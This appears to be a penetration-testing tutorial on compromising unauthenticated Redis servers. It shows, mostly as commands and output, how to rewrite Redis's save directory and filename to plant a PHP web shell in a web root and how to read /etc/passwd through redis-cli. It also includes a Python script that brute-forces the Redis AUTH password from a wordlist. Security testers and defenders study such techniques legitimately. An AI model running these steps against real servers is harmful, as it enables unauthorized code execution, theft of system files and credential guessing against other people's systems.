
REDIS - Export File / Read File / Cracker

Export File

If Redis and the web service run on the same server, we may be able to get a shell.

  1. Connect to redis port (default: 6379).
  1. Get current configuration
:> CONFIG GET *
  ) "dbfilename"
  ) "dump.rdb"
  ) "requirepass"
  ) ""
  ) "masterauth"
  ) ""
  ) "unixsocket"
  ) ""
  ) "logfile"
 ) ""
 ) "pidfile"
 ) "/var/run/redis_6379.pid"
 ) "maxmemory"
 ) "3221225472"
 ) "maxmemory-samples"
 ) "5"
 ) "timeout"
 ) "0"
 ) "tcp-keepalive"
 ) "0"
 ) "auto-aof-rewrite-percentage"
 ) "100"
 ) "auto-aof-rewrite-min-size"
 ) "67108864"
 ) "hash-max-ziplist-entries"
 ) "512"
 ) "hash-max-ziplist-value"
 ) "64"
 ) "list-max-ziplist-entries"
 ) "512"
 ) "list-max-ziplist-value"
 ) "64"
 ) "set-max-intset-entries"
 ) "512"
 ) "zset-max-ziplist-entries"
 ) "128"
 ) "zset-max-ziplist-value"
 ) "64"
 ) "hll-sparse-max-bytes"
 ) "3000"
 ) "lua-time-limit"
 ) "5000"
 ) "slowlog-log-slower-than"
 ) "10000"
 ) "latency-monitor-threshold"
 ) "0"
 ) "slowlog-max-len"
 ) "128"
 ) "port"
 ) "6379"
 ) "tcp-backlog"
 ) "511"
 ) "databases"
 ) "16"
 ) "repl-ping-slave-period"
 ) "10"
 ) "repl-timeout"
 ) "60"
 ) "repl-backlog-size"
 ) "1048576"
 ) "repl-backlog-ttl"
 ) "3600"
 ) "maxclients"
 ) "10000"
 ) "watchdog-period"
 ) "0"
 ) "slave-priority"
 ) "100"
 ) "min-slaves-to-write"
 ) "0"
 ) "min-slaves-max-lag"
 ) "10"
 ) "hz"
 ) "10"
 ) "cluster-node-timeout"
 ) "15000"
 ) "cluster-migration-barrier"
 ) "1"
 ) "cluster-slave-validity-factor"
 ) "10"
 ) "repl-diskless-sync-delay"
 ) "5"
 ) "cluster-require-full-coverage"
 ) "yes"
 ) "no-appendfsync-on-rewrite"
 ) "no"
 ) "slave-serve-stale-data"
 ) "yes"
 ) "slave-read-only"
 ) "yes"
 ) "stop-writes-on-bgsave-error"
 ) "yes"
 ) "daemonize"
 ) "yes"
 ) "rdbcompression"
 ) "yes"
 ) "rdbchecksum"
 ) "yes"
 ) "activerehashing"
) "yes"
) "repl-disable-tcp-nodelay"
) "no"
) "repl-diskless-sync"
) "no"
) "aof-rewrite-incremental-fsync"
) "yes"
) "aof-load-truncated"
) "yes"
) "appendonly"
) "no"
) "dir"
) "/var/redis/6379"
) "maxmemory-policy"
) "noeviction"
) "appendfsync"
) "everysec"
) "save"
) "900 1 300 10 60 10000"
) "loglevel"
) "notice"
) "client-output-buffer-limit"
) "normal 0 0 0 slave 268435456 67108864 60 pubsub 33554432 8388608 60"
) "unixsocketperm"
) "0"
) "slaveof"
) ""
) "notify-keyspace-events"
) ""
) "bind"
) ""
:> 
           
  1. Export DB File.

    During a penetration test, we can export a web shell the same way.

:> CONFIG SET dir /var/www/
OK
:> CONFIG SET dbfilename backdoor.php
OK
:> SET data "<?php phpinfo(); ?>"
OK
:> SAVE
OK
:> QUIT
           

We can view the PHP information here.

root@kali:~# curl -o data.txt  http://localhost:8080/backdoor.php
  % Total    % Received % Xferd  Average Speed   Time    Time     Time  Current
                                 Dload  Upload   Total   Spent    Left  Speed
                 k       --:--:-- --:--:-- --:--:-- k
root@kali:~# grep --color -i -n -a phpinfo data.txt 
:<title>phpinfo()</title><meta name="ROBOTS" content="NOINDEX,NOFOLLOW,NOARCHIVE" /></head>
           
REDIS - Export File / Read File / Cracker
  1. Restore REDIS Configuration

Clear the data created by the Redis operation, and restore the previous configuration.

:> CONFIG SET dbfilename dump.rdb
OK
:> CONFIG SET dir /var/redis//
OK
:> KEYS *
) "bar"
) "key"
) "foo"
) "data"
:> DEL data
(integer) 
:> KEYS *
) "bar"
) "key"
) "foo"
:> SAVE
OK
           

Read File

redis-cli -x HSET passwd text </etc/passwd
redis-cli --raw HGET passwd text >/tmp/passwd 
redis-cli DEL passwd
           

REDIS Cracker

If the Redis server has a password set, we can crack it with the following demo.

#!/usr/bin/env python
# -*- coding: utf8 -*-

import socket
import logging


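logging.basicConfig(level=logging.DEBUG,
                    format="[*] %(funcName)s - %(message)s")

# Module logger. Note that crack_redis below also logs through the root
# logger (logging.info / logging.debug); basicConfig above covers both.
logger = logging.getLogger('redis_cracker')
# Maximum number of bytes read per recv(). The original value was lost when
# the page was extracted; 4096 is a constructed default.
BUFSIZE = 4096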


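def crack_redis(host, port, password):
    """Try one candidate password against a Redis instance.

    The probe sends INFO first: a server that replies
    "-NOAUTH Authentication required" has requirepass configured, so a
    single AUTH with ``password`` is then attempted. Any other INFO reply
    is treated as an unprotected instance.

    Args:
        host: Redis host name or address.
        port: Redis TCP port (int).
        password: the single candidate password to try.

    Returns:
        (True, password)  AUTH was accepted ("+OK").
        (True, None)      the server did not require AUTH at all.
        (False, None)     connection failed, or the password was rejected.
    """
    logger.debug('cracking resdis %s:%s with %s' % (host, port, password))

    # create a socket for redis connection
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    try:
        ret = sock.connect_ex((host, port))

        # failed to make a redis connection (connect_ex returns 0 on success)
        if ret != 0:
            logging.info("failed to connect to redis")
            return False, None

        # send a INFO request; sendall() so a short write is not silently lost
        sock.sendall(b'INFO\r\n')

        # recv socket resp; decoded so the substring checks below behave the
        # same on Python 2 (str) and Python 3 (bytes) sockets
        data = sock.recv(BUFSIZE).decode('utf-8', 'replace')

        if "NOAUTH Authentication required" in data:
            # crack password
            sock.sendall(('AUTH %s\r\n' % password).encode('utf-8'))
            data = sock.recv(BUFSIZE).decode('utf-8', 'replace')

            # auth successfully
            if "+OK" in data:
                logging.info("redis pass: [%s]\n" % password)
                return True, password

            # auth failed; the server's error line (e.g. "-ERR invalid
            # password") is logged as-is
            logging.debug("%s\n" % data.strip())
        else:
            logging.info("No password protection\n")
            return True, None

        return False, None
    finally:
        # release the connection on every exit path, including early returns
        sock.close()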


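if __name__ == "__main__":
    # demo wordlist from the write-up; the loop stops at the first hit
    passwords = ['admin', 'pass', 'password', '123']

    host = "localhost"
    port = 6379  # Redis default port

    for p in passwords:
        # named 'found' rather than 'bool' so the builtin is not shadowed
        found, pwd = crack_redis(host, port, p)
        if found:
            break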
           

Now we can crack the localhost Redis server.

root@kali:~# python2 crack_redis.py 
[*] crack_redis - cracking resdis localhost: with admin
[*] crack_redis - -ERR invalid password

[*] crack_redis - cracking resdis localhost: with pass
[*] crack_redis - -ERR invalid password

[*] crack_redis - cracking resdis localhost: with password
[*] crack_redis - redis pass: [password]
           

Redis pass: [password].

root@kali:~# redis-cli -h localhost -p 6379
localhost:> AUTH password
OK
           

Authentication is successful.

References

CN - Trying to hack Redis via HTTP requests

EN - Trying to hack Redis via HTTP requests